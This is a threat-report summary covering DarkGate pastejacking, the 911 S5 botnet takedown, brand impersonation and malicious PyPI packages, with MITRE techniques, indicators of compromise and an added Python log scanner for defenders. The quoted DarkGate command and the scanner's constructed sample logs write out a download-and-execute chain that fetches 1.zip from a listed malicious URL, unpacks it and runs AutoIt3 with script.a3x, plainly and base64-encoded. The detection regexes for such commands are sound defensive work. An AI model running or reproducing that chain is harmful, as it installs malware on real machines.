Hornetsecurity’s May Monthly Threat Report highlights a rise in email-based threats driven by easily detectable, low-effort spam, plus a notable increase in malicious attachments and targeted campaigns across industries. It also covers DarkGate pastejacking, the 911 S5 Proxy Botnet takedown, and impersonation campaigns (FedEx, Facebook), as well as malicious PyPI packages pushed through Stack Overflow answers. #DarkGate #Pastejacking #911S5ProxyBotnet #Fedex #Facebook #StackOverflow #PyPI
Key points
- Email-based threats rose in May, driven largely by easily detectable low-effort spam messages.
- Malicious file attachments increased, with archive files rising 13.2 percentage points in usage.
- All business verticals faced more targeting, led by the mining, entertainment, and media sectors.
- Brand impersonation spiked for FedEx and Facebook.
- A new DarkGate campaign used pastejacking to distribute malware; the report contains a detailed deep-dive.
- The 911 S5 Proxy Botnet was dismantled by US and international partners, in what may be the largest botnet takedown to date (over 19 million IPs involved).
- Threat actors have exploited Stack Overflow by guiding users to download malicious PyPI packages.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – The report notes a rise in malicious attachments, with archive files up 13.2 percentage points. – “There was a clear increase in the use of malicious attachments over the last month.”
- [T1059.003] Windows Command Shell – The article shows a command line flow starting with cmd /c start /min powershell … – “cmd /c start /min powershell $jr = 'c:\users\public\Dp.hta'; invokewebrequest -uri …”
- [T1059.001] PowerShell – Base64 decoding and execution via iex PowerShell cmdlet – “Next, a base64 string is decoded and executed thanks to the iex PowerShell cmdlet.”
- [T1105] Ingress Tool Transfer – The script downloads a ZIP from a remote server, expands it, and executes it (AutoIt3) as part of infection. – “The script downloads a ZIP document called 1.zip from a remote server, saves it in the c: folder, unzips the content and deletes the previously downloaded ZIP. Then, to perform the infection, it runs AutoIt3.exe with script.a3x as an argument.”
- [T1115] Clipboard Data – The technique copies content to the clipboard as part of the pastejacking flow. – “copies the web page’s title content, previously decoded by the atob function, to the clipboard … Pastejacking.”
- [T1132] Data Encoding – The use of base64 encoding/decoding to conceal the payload. – “base64 string is decoded and executed”
Indicators of Compromise
- [IP Address] – more than 19 million unique IP addresses were involved in the 911 S5 Botnet takedown
- [Domain] – megabrightsigns[.]com, languangjob[.]com (sender domains used in the May 27–28 campaigns)
- [URL] – hxxps://kostumn1.ilabserver.com/1.zip, hxxps://jenniferwelsh.com/header.png (and other listed phishing-related URLs)
- [SHA-256] – 5316fc2cb4c54ba46a42e77e9ee387d158f0f3dc7456a0c549f9718b081c6c26, 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
- [FileName] – 1.zip, AutoIt3.exe, script.a3x (files referenced in the DarkGate workflow)
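As an added example that is not part of Hornetsecurity’s report or of this summary, the Python below turns the MITRE techniques and the indicators listed above into a small process-log scanner for a defender: it refangs the defanged domains and URLs, decodes long base64 runs so a PowerShell -EncodedCommand payload can be inspected, and flags the behaviours of the described DarkGate chain (cmd launching a minimised PowerShell, a web download, Expand-Archive, AutoIt3 running an .a3x script, clipboard writes). The log lines, their field layout and the encoded inner script are constructed for the example; the heuristic names and the scoring are my own choices, not the report’s.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# Indicators exactly as listed in the summary above, still defanged; refanged below for matching.
DEFANGED_IOCS = [
    "megabrightsigns[.]com",
    "languangjob[.]com",
    "hxxps://kostumn1.ilabserver.com/1.zip",
    "hxxps://jenniferwelsh.com/header.png",
]
IOC_SHA256 = {
    "5316fc2cb4c54ba46a42e77e9ee387d158f0f3dc7456a0c549f9718b081c6c26",
    "237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d",
}


def refang(ioc: str) -> str:
    """Convert a defanged indicator (hxxps://, [.]) back into its matchable form."""
    return ioc.replace("[.]", ".").replace("hxxps://", "https://").replace("hxxp://", "http://")


REFANGED_IOCS = [refang(i) for i in DEFANGED_IOCS]

# Behavioural patterns for the chain in the MITRE section, keyed by technique (names chosen for this example).
HEURISTICS = {
    "T1059.003 cmd starts minimised PowerShell": re.compile(r"cmd(\.exe)?\s+/c\s+start\s+/min\s+powershell", re.I),
    "T1105 web download": re.compile(r"invoke-?webrequest|\biwr\b|download(string|file)", re.I),
    "T1132 encoded command": re.compile(r"\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I),
    "T1059.001 base64 decoded into iex": re.compile(r"frombase64string[\s\S]*\biex\b|\biex\b[\s\S]*frombase64string", re.I),
    "T1105 archive expanded": re.compile(r"expand-archive", re.I),
    "AutoIt3 runs .a3x script": re.compile(r"autoit3(\.exe)?\s+\S+\.a3x", re.I),
    "T1115 clipboard write": re.compile(r"set-clipboard|clipboard\.writetext", re.I),
}

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_base64_blobs(text: str) -> list[str]:
    """Decode long base64 runs (UTF-16LE first, as -EncodedCommand uses, then UTF-8) so inner scripts are visible."""
    out = []
    for m in B64_RUN.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                out.append(raw.decode(enc))
            except UnicodeDecodeError:
                pass
    return out


@dataclass
class Finding:
    line_no: int
    iocs: list
    techniques: list

    @property
    def score(self) -> int:
        # A known indicator weighs more than a generic behaviour; one heuristic alone is low confidence.
        return 3 * len(self.iocs) + len(self.techniques)


def scan_log(lines):
    """Return one Finding per log line that matches a listed indicator or a behavioural pattern."""
    findings = []
    for n, line in enumerate(lines, 1):
        # Search the raw line plus anything hidden inside base64 runs on that line.
        haystack = "\n".join([line, *decode_base64_blobs(line)])
        low = haystack.lower()
        iocs = [i for i in REFANGED_IOCS if i.lower() in low] + sorted(h for h in IOC_SHA256 if h in low)
        techniques = [name for name, rx in HEURISTICS.items() if rx.search(haystack)]
        if iocs or techniques:
            findings.append(Finding(n, iocs, techniques))
    return findings


# Constructed process-creation log lines (not from the report): host1 replays the described chain,
# host2 is a benign PowerShell invocation that must not be flagged.
_INNER = ("$z='c:\\1.zip'; invoke-webrequest -uri https://kostumn1.ilabserver.com/1.zip -outfile $z; "
          "expand-archive $z c:\\; remove-item $z; c:\\AutoIt3.exe c:\\script.a3x")
_ENCODED = base64.b64encode(_INNER.encode("utf-16-le")).decode()
SAMPLE_LOGS = [
    "2024-05-28T10:01:02Z host1 ProcessCreate cmdline=\"cmd /c start /min powershell $jr = 'c:\\users\\public\\Dp.hta'; "
    "invoke-webrequest -uri https://jenniferwelsh.com/header.png -outfile $jr\"",
    f'2024-05-28T10:01:05Z host1 ProcessCreate cmdline="powershell -nop -w hidden -ec {_ENCODED}"',
    '2024-05-28T10:01:09Z host1 ProcessCreate cmdline="c:\\AutoIt3.exe c:\\script.a3x"',
    '2024-05-28T10:02:00Z host2 ProcessCreate cmdline="powershell -command Get-ChildItem c:\\temp"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOGS):
        print(f"line {f.line_no}: score={f.score} iocs={f.iocs} techniques={f.techniques}")
```

The scanner deliberately matches indicators inside the decoded payload as well as on the raw line, because the URL of 1.zip in the described chain only appears after the base64 stage; the score is a triage aid, not a verdict, and the behavioural patterns are written broadly enough that they should be tuned against an environment’s own baseline before being used for alerting.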
Read more: https://www.hornetsecurity.com/en/threat-research/monthly-threat-report-june-2024/